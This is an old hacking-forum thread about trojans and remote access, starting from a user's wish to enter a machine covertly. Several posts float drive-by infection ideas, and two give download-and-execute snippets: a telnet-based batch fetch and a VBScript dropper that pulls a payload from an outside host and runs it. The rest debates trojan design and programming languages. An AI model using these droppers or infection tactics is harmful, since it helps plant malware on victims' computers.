Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

telnet and remote access


TommyCat's Avatar
Member
0 0

Hello. I have some knowledge about hacking.. I have used some remote administration tools in the past, like net devil, sub seven, pro rat. I also did some research on how this RAT's work. I am also familliar with Putty as I used few irc bouncers in the past. I have some knowledge of HTML, C++, VB, and I am currently working at my own trojan and RAT, coded in VB6. I even begun to learn linux.. started with a Knoppix LiveCd for now :). OK.. now my problem. As I said before, I used some RAT's in the past. The problem is that I was infecting the victims only by social engineering. I now try to learn how to gain access without the victim knowing it. I have NetCat for windows and I tried something: I port scanned myself. Port 23(TelNet) was closed. Ok.. I opened and listened to it with netcat. Now I open a cmd window and start a TelNet session. I try to connect to my own computer, knowing that port 23 is open and it doesn't work. I have also tried that with other ports. Nothing works. I think I am missing something here because i ask myself: How can i learn to gain acces in another machine if i can't even acces mine with the whole damn door open? I try this for over a week now.. done some reading etc.. google is my desktop background.. so i use it a lot. I'm beginning to be a little frustrated here. I need some hints please.


Uber0n's Avatar
Member
0 0

I can tell you that you won't be able to infect people just by knowing an open port on their computer; it requires some kind of vulnerable service to be running as well ;)


ghost's Avatar
0 0

Uber0n wrote: I can tell you that you won't be able to infect people just by knowing an open port on their computer; it requires some kind of vulnerable service to be running as well ;)

Or brute forcing. (just throwing it out there :D)


Uber0n's Avatar
Member
0 0

skathgh420 wrote: Or brute forcing. (just throwing it out there :D) How would you bruteforce a file into someone's computer? :right:


ghost's Avatar
0 0

Uber0n wrote: [quote]skathgh420 wrote: Or brute forcing. (just throwing it out there :D) How would you bruteforce a file into someone's computer? :right:[/quote]

Lol sorry I wasn't clear. You could brute force a login on ftp, or something else, and upload the file.


TommyCat's Avatar
Member
0 0

Uber0n wrote: I can tell you that you won't be able to infect people just by knowing an open port on their computer; it requires some kind of vulnerable service to be running as well ;)

It's an ordinary windows XP machine.. service pack 2, with telnet service stopped by default. So It's not like I can bruteforce a telnet login or ftp login.. I did a port scan on a friend's computer (that agreed for my learning purposes) 1 to 30000 (I'll continue till 65535 later, as it took me a while :) ) and it didn't show any open ports. That leaves me asking myself if is there any way to open a port remotely without having any kind of access to that machine. ?? and if there was a vulnerable service running, should there be an open port? or can i open it remotely given the fact that the machine i'm trying to access has that specific vulnerable service running?


ghost's Avatar
0 0

TommyCat wrote:

  1. Is there any way to open a port remotely without having any kind of access to that machine. ??
  2. If there was a vulnerable service running, should there be an open port?
  3. Can i open it remotely given the fact that the machine i'm trying to access has that specific vulnerable service running?
  4. No.
  5. If there is a service of any kind offering some sort of functionality (web server, file server, file sharing, etc.), then yes, there should be an open port.
  6. If you can compromise a running service on an open port, then you can most likely find a way to open others, yes. It depends on what level of access the compromise gives you.

TommyCat's Avatar
Member
0 0

Zephyr_Pure wrote:

  1. No.
  2. If there is a service of any kind offering some sort of functionality (web server, file server, file sharing, etc.), then yes, there should be an open port.
  3. If you can compromise a running service on an open port, then you can most likely find a way to open others, yes. It depends on what level of access the compromise gives you.

But let's say that we have a situation in which the machine does not offer any kind of functionality like web server, ftp server, file sharing. It's just a machine running windows xp that a person uses to browse the web, read email, instant message and play computer games. Nothing out of the ordinary. The only thing that my machine and that machine have in common is the ISP. As I said before, the other machine is the property of a neighbour that agreed that I coud try and gain access to his machine for learning purposes. Not even telnet server is running on that machine. ( :) if it was running i wouldn't have posted :) ) hope someone can make me understand what i'm trying to understand.


ghost's Avatar
0 0

i think that you can send him a trojan and it will open port .you can take it here on hbh if you are script kid, but i think that you can use it ones or twice for learning and later make one. (sorry if i am wrong lol)


ghost's Avatar
0 0

TommyCat wrote: It's just a machine running windows xp that a person uses to browse the web, read email, instant message and play computer games. Nothing out of the ordinary. The only thing that my machine and that machine have in common is the ISP. As I said before, the other machine is the property of a neighbour that agreed that I coud try and gain access to his machine for learning purposes. Not even telnet server is running on that machine. ( :) if it was running i wouldn't have posted :) ) hope someone can make me understand what i'm trying to understand.

Is your target behind a router? That could also be a target (and also the reason why you're seeing "no open ports").

If I recall correctly, Windows XP (and probably other OS's) use ports for their own local system services (such as the Workstation and Server services). You could do research on what ports these services normally operate on, then hunt for exploit techniques (the Server service is actually mentioned in a recent news item here) and craft a packet from that. For now, let's just assume that your port scan is being detected and fed false information.


TommyCat's Avatar
Member
0 0

bullet wrote: i think that you can send him a trojan and it will open port .you can take it here on hbh if you are script kid, but i think that you can use it ones or twice for learning and later make one. (sorry if i am wrong lol) Well I'm not a script kiddie.. as I said before, I am currently developing my own trojan/RAT using VB6, but sending trojans and making someone accepting them is social engineering. I am good at this.. but I don't find it challenging. My purpose isn't to gain access to that specific machine, but learning how to do it without social engineering, I mean without having to communicate with the owner of the machine.


TommyCat's Avatar
Member
0 0

Zephyr_Pure wrote: Is your target behind a router? That could also be a target (and also the reason why you're seeing "no open ports").

If I recall correctly, Windows XP (and probably other OS's) use ports for their own local system services (such as the Workstation and Server services). You could do research on what ports these services normally operate on, then hunt for exploit techniques (the Server service is actually mentioned in a recent news item here) and craft a packet from that. For now, let's just assume that your port scan is being detected and fed false information.

The target is not behind a router, but I'll do some research on ports used by the local system in XP. Thanks.


ghost's Avatar
0 0

only way to attack a computer with no open ports is a vulnerability in the TCP/IP stack..which unless you're a hardcore reverser, don't hold your breath finding one

EDIT: thats if there are any left anyway (probably will find a few more when IPv6 becomes widely used)


ghost's Avatar
0 0

NigNig wrote: only way to attack a computer with no open ports is a vulnerability in the TCP/IP stack..which unless you're a hardcore reverser, don't hold your breath finding one

EDIT: thats if there are any left anyway (probably will find a few more when IPv6 becomes widely used)

There's obviously vulnerabilities. Nothing is foolproof.

@OP: I don't think just practicing on a personal computer isn't very useful. In an actual attack you're going to be going for servers and stuff that are on big networks. Set up a web server and attack that. Try to set one up with a forum (maybe an old version of phpbb) and have HTTP,SSH,FTP, and Telnet access. First work on the web application, try to find vulnerabilities. After that, take down the services. I would recommend using older versions for these as well. After accessing it, is there a way that you can gain root (administrative) access? If you're on linux, maybe have an older kernel, find some exploits in that. For windows, just plant a file there and simulate an administrator clicking on it.


Uber0n's Avatar
Member
0 0

There's no way to magically open a port and make it obey all your commands. You must realize that :right: I mean otherwise you'd be able to root any computer at any time …


ghost's Avatar
0 0

Uber0n wrote: There's no way to magically open a port and make it obey all your commands. You must realize that :right: I mean otherwise you'd be able to root any computer at any time … … I just rooted you over SMTP. Pwnz0r3d!! :P


Uber0n's Avatar
Member
0 0

Zephyr_Pure wrote: … I just rooted you over SMTP. Pwnz0r3d!! :P Now THAT'd be interesting, lol


ghost's Avatar
0 0

There is no almost no way to get the trojan on your friends PC. You can try to hide it in another file(dropper) and send it via email or msn. But there are also a few othere possibilities. FOr example there are a few exploits which you can integrate into your website. They cause that if someone visits the sude a file will be loaded in the background so that he doesn't know. Try to search for exploits in milw0rm. There were lately some for chrome.

And another think would you be interested in writting the trojan together with me. I have experience with VB6 and I already programmed some Trojans to see how it works. But they weren'T really good =) they were only for learning supose.

Greetz NoPax


Uber0n's Avatar
Member
0 0

NoPax wrote: FOr example there are a few exploits which you can integrate into your website. They cause that if someone visits the sude a file will be loaded in the background so that he doesn't know. As far as I know, there's no such thing as automatically uploading and executing an .exe file on a website visitor's computer… :ninja:


ghost's Avatar
0 0

Uber0n wrote: As far as I know, there's no such thing as automatically uploading and executing an .exe file on a website visitor's computer… :ninja: Agreed… unless ActiveX has that functionality. I'm not knowledgeable enough about it to know.


ghost's Avatar
0 0

There are. I used once something like that i think it was called icepack or something like that. I'll search after it and then I tell you. It could be that it doesn't execute it but if it'S downloaded into the Autostart it doesn't matter.

Greetz NoPax


Uber0n's Avatar
Member
0 0

Then can you explain why we don't get infected and backdoored a hundred times a day because we browse random sites?

I'm looking forward to your proof :happy:


ghost's Avatar
0 0

So okay now I know why noone seemed to know icepack it's a exploit known only in the german hacker sceen. Perhaps you kann let translate this artikel with google. http://blog.chip.de/0-security-blog/icepack-neues-malware-kit-im-angebot-20070728/

SO I can explain how, because you have to pay for this exploit it's not for free and the second reason is that most of the AV programms know it expect you buy the platin version. And it works only on windows. Second reason: You have to modify it to your server, so the most script kiddies can't use it( this is perhaps not a good argument :D )

Greetz NoPax


Uber0n's Avatar
Member
0 0

It's a small exploit framework which contains exploits for the following vulnerabilities:

MS06-014 Internet Explorer 6 - MS06-006 Firefox 1.5 MS06-006 Opera 7 WVF Overflow QuickTime Overflow WinZip Overflow VML Overflow It's NOT a method for backdooring and running .exe files on all visitors of a page, just a bunch of outdated browser exploits and stuff (FF 1.5? IE6? Geez :angry: )


ghost's Avatar
0 0

But if you went on it with the old server, it downloads a file and this could be a trojan. Or am I wrong ?

Greetz NoPax


Uber0n's Avatar
Member
0 0

If that was possible (I must say if since I don't know for sure), that was only because of bugs/vulnerabilities in the browser and not a general exploit method.

Get the difference?


ghost's Avatar
0 0

Actually, I was just thinking, VBScript. It has access to the file system and can execute other programs. So, even though it only works on IE on Windows, it is still an effective way of getting a trojan onto the person's computer and running it (since most people use IE and Windows). You'd have to find a place to actually be able to write to, but once you did that, whoever uses Windows and IE could be infected. The only trouble would be getting it to run fast enough so that the user won't know what it's doing. Might cause a problem when trying to send over an entire binary file. But I suppose you could make a batch script that could download a seperate binary file and then execute it. The batch script could look something like, uhm, maybe:

echo "GET /file.exe HTTP/1.1\r\nHost: somehost\r\n\r\n" | telnet yourserver.com 80 > file.exe
start file.exe

Not sure though, haven't done batch scripting in a while.

Not sure about what the VBScript file would look like though, I'd have to read up on it.

Anyway, correct me if I'm wrong.


Uber0n's Avatar
Member
0 0

VBScript is protected against that, it can't create and execute a batch file on the website visitor's computer and finally using ECHO in batch would simply output the string in the console window - not download the target file.


ghost's Avatar
0 0

Uberon I got the difference but i didn't mean it in generall. But you still can buy ice pack and it will work because they always update it.

And I thought you can create with VBS a file and write in it. So why not create file.exe in Autostart And copy the code of a download dropper in it ?

Greetz NoPax


Uber0n's Avatar
Member
0 0

NoPax wrote: Uberon I got the difference but i didn't mean it in generall. But you still can buy ice pack and it will work because they always update it. I can't find any ice pack releases with FF3 support, in fact not even FF2… Where can I see these updated versions? :right:

And I thought you can create with VBS a file and write in it. So why not create file.exe in Autostart And copy the code of a download dropper in it ? There's a big difference between running a VBS file from your own file system and using it on web pages. Try it B)


ghost's Avatar
0 0

Hm I though they update because 1 year ago or longer when I looked it up there were sometimes some updates. COuld be that it changed since then.

Okay I will try it when i get my server =) But I thought you can add a script in your page to write a document. And than you could put in it

set fso = createobject("Scripting.filesystemobject")
set s01 = Wscript.CreateObject("Wscript.shell")
set into=createobject("inetctls.inet")
into.requesttimeout=20
data=ineto.openurl("http://www.blob.com/blob.txt")
if not(data="") then
set downloaded=fsys.createtextfile("C:\NewUpdate.000")
downloaded.write data
downloaded.close
fso.copyfile "C:\NewUpdate.000" , "C:\server.exe"
s01.run "C:\server.exe"
end if```

ANd on the server you put the exe file as an .txt file. 
But I'm not sure if it works. That is a method how you can update vbs worms or virii but if it works with .exe i don't know.
But it was only an idea.

Greetz
NoPax

Uber0n's Avatar
Member
0 0

NoPax wrote: Okay I will try it when i get my server =) Do so, and don't forget to post your results ;)


ghost's Avatar
0 0

Okay. But it seems that you know that it will not work =)

Greetz NoPax


Uber0n's Avatar
Member
0 0

NoPax wrote: Okay. But it seems that you know that it will not work =) Let's just say I'd be very surprised if it did, but don't let that stop you ;)

New exploits are only found by those who try things that theoretically shouldn't be possible.


ghost's Avatar
0 0

All right =) I hope I find a exploit =) That woud be my second found =)

Greetz NoPax


TommyCat's Avatar
Member
0 0

Well, I have been absent from HBH for a pretty long time.. I can tell you that reading the first post on this thread makes me wonder how could I write that :)

What I was trying to say back then was another thing, which I now understand. Read on, and you'll understand too. I didn't express myself very clearly, and I didn't have the knowledge. I had some time to study, so now I know how that can be achieved. :love:
 
 *I now write this for all of you who read this and are not yet on the right path.*

 *First of all*, some believe that ProRat's (free) client is malicious. The client downloads a malicious file named "Small.exe" to "c:\a" and then runs it. So if you are using ProRat, somebody else might be "trojaning" his/her way into your system. 
  If you want to check for yourself, just use a resource editor and go into SERVERFILE -> MINI_DOWNLOADER, and see for yourself.
 Other *Free Remote Administration Tools* may or may not work in the same way. If you like to use trojans, make your own, and only test those that exist for "information and inspiration". 

 It's not that simple, but if you really want to *"Become a Hacker"* you must learn, among others, *Computer Programming*. A little advice: start with an easy-to-learn programming language, like **Pascal**, or **Visual Basic**. You can get Visual Studio Express for free from the Miccrosoft website.

And.. read. Read as much as you can. Read everything you can, and what's very important is that if you don't fully understand something, just ask someone.. be that person a teacher, a friend, or just a forum. 

** A good start** are those "Learn C in 21 days" or "Learn Visual Basic in 21 days" or "Learn [something] in [whatever] days" tutorials you can find on the internet. The decision on what programming language to start with is yours and only yours.. Read something about Visual Basic, Visual C, C, C++, C#, Python, PERL, LISP, WhiteSpace ( this one is kinda funny :D ) and the list goes on and on. Just do a Google search for "Programming Languages" and read a little bit about each one, see some pictures, applications written in that programming language, test it a bit, and you will finally find one that suites you :)

**Python** programmers are fairly rare these days compared to VB or C programmers. My opinion is that Python doesn't yet have a very friendly IDE (Integrated Development Environment ), but other than that, it is very powerful, and its syntax is very very clear. I have found some nice IDE's on the internet, especially one named "boa constructor" which allows easy development of GUI applications. Other than that there is also Aptana with Pydev.. also nice.. and the list goes on.

Turbo Pascal. This one is fairly old, and not very very powerful, but what i would like to say is that this one can really make a big difference. If you start with this one, you can really [ and I mean REALLY ] get to develop your logic thinking for programming. Strucures from Pascal and syntax likewise Pascal's can be found in allmost every programming language that exists. You learn basic logics, you learn about the screen's (display's) physical and logical structure, you learn basic data structures and so one. I can say that with Pascal you get to construct the basic logic that you need to advance in the art of computer programming.

** Visual Studio**(Basic, C, etc) has the big advantage of great user friendlyness I mean, so many features (like code completion, highlighting names of all instances of a specific variable in real time, easy integration of libraries, controls, etc in your application, etc etc etc) so this could be a good start too

I'm not going to debate here each and every programming language that I know, and I also don't expect you, the reader, to take into consideration only the features that i listed above for the IDE's and programming languages that I wrote about. All IDE's and programming languages listed above have far more abilities and features. And what's also important is that there are many more programming languages and IDE's with many features around. You should choose the one that suites you best.

 Back to trojans. Well, trojans are not so "high-tech", or in other words they don't require that the person that uses them has a very good understanding on how they work. 
 Most of them are basically the same thing, a server application that hides itself under a legitimate name, or hides completely. This server application accepts connections from a *client* application which can be found on the attacker's computer. Trough this, the attacker can execute code on the target machine (the one which has the server application running). 
Trojans are mostly used for malicious purposes, such as uploading a keylogger on the target machine to get sensitive information about its user or users, or other malicious tasks. 
Putting a trojan on a machine usually require (for uninitiated persons) social engineering, that is, convincing the victim to run it trough different methods such as communicating with the victim or hide the trojan inside a legitimate application for the victim to take it on his/her own from whatever place is it in (web site etc), or many other ways.


BUT. Once you read a little bit about ***exploits*** and what they are you will find yourself holding a "suc**er" sign, just like in the cartoons :). 
Why? Because you will realize that ready-made trojans that reside on the internet under the name of "Remote Administration Tool" are nothing but dust in the wind compared to the real world of Hacking.           Well, I believe that it is time to throw away that "suc**er" sign. Go ahead, take the red pill. 
You'll see the beautiful art of programming and designing your own stuff, and so on. Just don't think that you're a hacker if you only use tools that others created and anyone that reads a forum post for 10 minutes can use.

**Exploits**.. you can call them programming flaws, doors that are close, without a handle/knob, but unlocked. You can find exploits all over the place. 
You only have to find the right handle/knob for that door, or if the socket on the door looks like nobody has ever seen, but you think that you can forge a handle/knob that would fit this socket.. the go ahead and forge it. Then you can use it to open the door. Or maybe the door is locked, but you can find a key somewhere, or you can obtain an impregration of the key so that you can create the key. Or.. you have a wide variety of door handles and keys, and you really want/need to open a specific door.. go ahead, try the ones that you think would fit, or try the ones you want, or all of them.. this way.. you learn, you build up experience, you build  up your skills.

What's very important and you should always remember: A Hacker is not the person that goes around opening doors and breaking stuff.. It's the one that also tests if a door is unlocked, or if someone could unlock it and steal something from inside, and then notifies the appropriate entity. The person that learns more with everything he does, the person that tries to understand what he/she can't understand, ** the person** that can make others understand what they don't. The person that's wearing a white hat. Or a grey one if we are indulgent

Thank you for reading this and I hope you learned something.


fuser's Avatar
Member
0 -1

have you heard of this amazing thing called spacing between your words and making paragraphs?

because your post is very hard to read, it reminded me of the time when a drunk told me how the world is run by lizards or someshit.

edit it, and maybe I can comment on it better.


TommyCat's Avatar
Member
0 0

fuser wrote: have you heard of this amazing thing called spacing between your words and making paragraphs?

because your post is very hard to read, it reminded me of the time when a drunk told me how the world is run by lizards or someshit.

edit it, and maybe I can comment on it better.

 It's done.
 I don't think it was ***that*** hard to read, but i'm happy to make it better and easier to read. The whole point is that the readers understand what I have to say :)
 If it's still hard to read, just let me know and I'll try to make it better.

stealth-'s Avatar
Ninja Extreme
0 0

TommyCat wrote: [quote]fuser wrote: have you heard of this amazing thing called spacing between your words and making paragraphs?

because your post is very hard to read, it reminded me of the time when a drunk told me how the world is run by lizards or someshit.

edit it, and maybe I can comment on it better.

 It's done.
 I don't think it was ***that*** hard to read, but i'm happy to make it better and easier to read. The whole point is that the readers understand what I have to say :)
 If it's still hard to read, just let me know and I'll try to make it better.[/quote]

Trust me, it's much better to read now than before. Not that bad of content, either. However, I have to disagree with you on the number of Python programmers. There are plenty. It has nothing to do with the IDE, either. In fact, most programmers don't use IDE's anyways, especially with scripting languages. A lot of people see them as simply tools that do the work for you and unnecessarily abstract the actual coding process, causing new programmers to not really understand what they're doing. The one other point I disagree with was the "trojans are simple programs" part. When you start considering NAT, log systems, and avoiding detection the "simple program" easily becomes a very large and complex one.

Aside from that, it was an interesting read. :)


fuser's Avatar
Member
0 -1

I agree with stealth there. In fact, I find it amusing about what you said on how unpopular python is.

Take a look at the codebank, for example: Python is the second most popular language in HBH, with 79 programming examples written for it, in contrast with VB.NET and C++.

However, I agree with your opinion that a person needs to learn proper programming techniques to develop a logical way of programming, although I think that some people would disagree with using Pascal, but each to their own, I guess. I mean, I could only grasp programming when I learned Java, (horrible I know) so each person to their own opinion, I guess.

Also, the ease of making a trojan depends on what you want it to do, and how do you want to do it. If lets say, you want to just view what the other person is doing, well, it's simple enough; but maybe you want to be able to read/write files on the disk and hide in the system processes, it's going to be a lot tougher.

Also, think out of the box; Adrian Lamo didn't even use any trojans, he just used a legal remote access tool. Why? Simple, would a security suite be alarmed when a legal application is connecting to the PC using a known port number, no, right? They'd just let it go through without blinking. That's another way of doing things.

But overall, I think your post is good.


spyware's Avatar
Banned
0 0

This thread is a billion years old.


Mtutnid's Avatar
Member
0 0

Who revived this thread? And btw if you are on the same network you might be able to access their router settings ect. people rarely change the password.


stealth-'s Avatar
Ninja Extreme
0 0

Mtutnid wrote: Who revived this thread? And btw if you are on the same network you might be able to access their router settings ect. people rarely change the password.

It's pretty obvious what happened if you actually read the thread ;)


TommyCat's Avatar
Member
0 0

stealth- wrote: I have to disagree with you on the number of Python programmers. There are plenty. It has nothing to do with the IDE, either. In fact, most programmers don't use IDE's anyways, especially with scripting languages. Aside from that, it was an interesting read. :)

About python.. please check TIOBE and you'll find out I'm right..

Programming language of 2010 is JAVA 2nd place - C 3rd place - C++ 4th place - PHP 5th place - VB 6th place - C# 7th place - Python

and next are: Objective-C, Perl, Ruby, Javascript, Delphi, Lisp, TransactSQL,

15th place - Pascal

following are: RPG, Ada, SAS, MATLAB, Go, NXT-G, Powershell, PL/SQL, Lua, ABAP, Scheme, Fortran, Object Pascal, Alice, Logo, C Shell, TCL, D, COBOL, ActionScript, Scratch, R

38th place: Visual Basic .NET

and the list goes on

The point here is:
  1. Python is less popular than VB, C, or Java
  2. Pascal is still ON and pretty popular
  3. Java is the most widely used programming language.

Source: http://www.tiobe.com/index.php/content/paperinfo/tpci/index.html

Thank you


ghost's Avatar
0 0

TIOBE wrote: The TIOBE Programming Community index is an indicator of the popularity of programming languages. The index is updated once a month. The ratings are based on the number of skilled engineers world-wide, courses and third party vendors. The popular search engines Google, MSN, Yahoo!, Wikipedia and YouTube are used to calculate the ratings.

That is not a reliable metric at all. The number of skilled practitioners + the number of bullshit courses + the number of vendors selling snake oil = a whole lot of lies. There is no way to measure the popularity of a programming language reliably, since any amount of information mining (no matter how great the sample group) cannot represent the whole.

Also, Wikipedia and YouTube are not "search engines". One is a digital encyclopedia (with questionable quality of articles) and the other is a social video sharing site.

Thus, the "TIOBE Programming Community Index" is crap, and should be ignored. The popularity of a programming language doesn't matter; only its usefulness to the programmer does.


TommyCat's Avatar
Member
0 0

stealth- wrote:

The one other point I disagree with was the "trojans are simple programs" part. When you start considering NAT, log systems, and avoiding detection the "simple program" easily becomes a very large and complex one.

Aside from that, it was an interesting read. :)

You're completely right. If you do take into consideration all the modules you could add to a trojan, then yes.. it will become a big, large, and complex project.

I was trying to express myself generally, so people can understand the basic concept of "trojan". Let me explain again. For example, a trojan could allow you to log all keys pressed by the victim. Does this mean that the trojan logs the keys pressed? Answer: No, the one that logs keys is the keylogger. This keylogger can be a separate executable controlled by a module in the trojan, or it can be itself a part (module) of the trojan.

 Anyways, I strongly believe that this is the correct way to think of trojans, as this way it's way simpler to find them, destroy them, or maybe just create them ;)

Thank you for reading


TommyCat's Avatar
Member
0 0

define wrote: The popularity of a programming language doesn't matter; only its usefulness to the programmer does.

Completely on the spot there.

Oh.. but you can't just completely ignore TIOBE. That list it's like a poll, not like an inquiry, so it's meant really for guidelines. It's really not meant to be something precise.

Thank You


spyware's Avatar
Banned
0 0

TommyCat wrote: The point here is:

  1. Python is less popular than VB, C, or Java
  2. Pascal is still ON and pretty popular
  3. Java is the most widely used programming language.

Pascal seems to be several times less ON and popular than Python, and since you defined Pascal tyo be "pretty" popular, we can assume Python to be at least more than pretty popular.


stealth-'s Avatar
Ninja Extreme
0 0

TommyCat wrote: [quote]stealth- wrote:

The one other point I disagree with was the "trojans are simple programs" part. When you start considering NAT, log systems, and avoiding detection the "simple program" easily becomes a very large and complex one.

Aside from that, it was an interesting read. :)

You're completely right. If you do take into consideration all the modules you could add to a trojan, then yes.. it will become a big, large, and complex project.

I was trying to express myself generally, so people can understand the basic concept of "trojan". Let me explain again. For example, a trojan could allow you to log all keys pressed by the victim. Does this mean that the trojan logs the keys pressed? Answer: No, the one that logs keys is the keylogger. This keylogger can be a separate executable controlled by a module in the trojan, or it can be itself a part (module) of the trojan.

 Anyways, I strongly believe that this is the correct way to think of trojans, as this way it's way simpler to find them, destroy them, or maybe just create them ;)

Thank you for reading[/quote]

NAT traversal and hiding itself are very much parts of the trojan. Unless you think the "receiving connections" part and the "existing on the computer" part are "modules". If you would really like to be technical with definitions, Wikipedia considers a trojan horse to be a piece of "malware that appears to perform a desirable function for the user prior to run or install but instead facilitates unauthorized access of the user's computer system". Which means it must also look like a functional piece of software and convince the user they are functional. They can be very in depth, but it really is opinion. I was more referring to a decent trojan, you seem to be referring to something like a 20 line python script.

As for the TIOBE, yes, it can be completely ignored. It is impossible to "rank" programming languages in the way they are. For example, most people won't even know what RPG, Ada, SAS, MATLAB, NXT-G, Powershell, ABAP, Scheme, Alice, C Shell, Scratch, or R actually are, but for some strange reason all of those languages come before VB.NET, which almost everyone will recognize as a programming language. It does not judge the popularity of programming languages, only makes a weak attempt at ranking their appearance on the internet.


TommyCat's Avatar
Member
0 0

spyware wrote: [ Pascal seems to be several times less ON and popular than Python, and since you defined Pascal tyo be "pretty" popular, we can assume Python to be at least more than pretty popular.

Python shure is popular, no doubt about it, and i think it's gonna become more and more popular. And abut Pascal, it's really just my opinion, and I don't expect everyone to agree with me on this one. I just want to remember you folks that there still is that cute little programming language named Pascal. The reason is that it's my first programming language, and I shure did learn a lot from it.

Thank you


TommyCat's Avatar
Member
0 0

stealth- wrote:

NAT traversal and hiding itself are very much parts of the trojan. Unless you think the "receiving connections" part and the "existing on the computer" part are "modules". If you would really like to be technical with definitions, Wikipedia considers a trojan horse to be a piece of "malware that appears to perform a desirable function for the user prior to run or install but instead facilitates unauthorized access of the user's computer system". Which means it must also look like a functional piece of software and convince the user they are functional. They can be very in depth, but it really is opinion. I was more referring to a decent trojan, you seem to be referring to something like a 20 line python script.

As for the TIOBE, yes, it can be completely ignored. It is impossible to "rank" programming languages in the way they are. For example, most people won't even know what RPG, Ada, SAS, MATLAB, NXT-G, Powershell, ABAP, Scheme, Alice, C Shell, Scratch, or R actually are, but for some strange reason all of those languages come before VB.NET, which almost everyone will recognize as a programming language. It does not judge the popularity of programming languages, only makes a weak attempt at ranking their appearance on the internet.

So you're saying that ProRat's trojan appears to perform a desirable function for the user? If so, you're actually half right, because the "client" part of ProRat is actually not as innocent as it wants to look. But if we talk about SubSeven or NetDevil.. I really don;t know what to say about this, because their trojan server doesn't disguise itself as a software that an user would like to run.

I agree with you about the complexity of a trojan, but if you want to explain trojans to someone that is not as geek as you or me, you should consider taking it easy, explaining level after level, so people can understand. That's what my post was all about.

Oh, and about TIOBE, I think they give rankings based of the number of lines wrote in that particular programming language each year.. so if VB,NET is far down the list, this can mean that Vb.NET is awesome, and you can concentrate 10-20 lines of code from another programming language in one Vb.NET line. (a little joke based on reality :) )

Thank you


chess_rock's Avatar
Member
0 0

TommyCat, you're a moron.


stealth-'s Avatar
Ninja Extreme
0 0

TommyCat wrote: So you're saying that ProRat's trojan appears to perform a desirable function for the user?

I'm saying, that according to wikipedia, it has to be disguised to have a desirable function and must trick the user into using it to be legitimately classified as a trojan.

I agree with you about the complexity of a trojan, but if you want to explain trojans to someone that is not as geek as you or me you should consider taking it easy, explaining level after level, so people can understand.

I'm sorry, but your system of "modules" of a program that do different functions and must be clarified properly seems much more complex than my "It's remote access software that hides itself". I'm not saying you have to describe all layers and possible functions of a trojan, I'm saying that if you want to build one yourself it's going to be a lot harder than coding "simple program", as you called it. This has really become a ridiculously stupid argument, and I don't know why you seem so worried over such a loosely based definition to begin with.

geek as you or me

I don't know about you, but I'm not a geek. Geek != Hacker

Oh, and about TIOBE, I think they give rankings based of the number of lines wrote in that particular programming language each year.. so if VB,NET is far down the list, this can mean that Vb.NET is awesome, and you can concentrate 10-20 lines of code from another programming language in one Vb.NET line. (a little joke based on reality :) )

That doesn't make it any more accurate. Less so, in fact, because you were using it as a way of describing how popular languages are.

chess_rock wrote: TommyCat, you're a moron.

A very argumentative one, too.

Thank you You're welcome.


TommyCat's Avatar
Member
0 0

chess_rock wrote: TommyCat, you're a moron.

Why? :)

stealth- wrote: A very argumentative one, too.

I'm not arguing with you or anybody else. From my point of view, this is just a discussion (In a discussion forum, waddaya know :) ) about trojans In a discussion one doesn't have to be right or wrong, but it's important we have our own opinions, based on our experience and knowledge.

I see you don't agree with my "modular" design. I didn't say that building a trojan is a piece of cake, something you do in 5 lines of code. Of course, nothing is That simple, because if it was, anyone could do it.

But.. Less complex things are less likely to malfunction ;)


spyware's Avatar
Banned
0 0

WHY IS THIS THREAD STILL GOING ON

ARGH


ghost's Avatar
0 0

just for you spy ;)

@ whoever necro'd the thread: If you have a question or something to say, or even something new to add to an old topic, make a new thread. I'm not about to read through 60 comments of general shit, just to find out what's going on here.


stealth-'s Avatar
Ninja Extreme
0 0

maug wrote: just for you spy ;)

@ whoever necro'd the thread: If you have a question or something to say, or even something new to add to an old topic, make a new thread. I'm not about to read through 60 comments of general shit, just to find out what's going on here.

If you don't want to read the thread, or even just skim the dates, then don't respond to it. :P TommyCat was just clarifying in an old thread to make things clear to anyone who happened to stumble across it, and we were discussing something related to his (quite in-depth) post. Although I don't see the problem with us discussing it, it's not like there is a whole lot going on in HBH right now, I think we're pretty much finished now.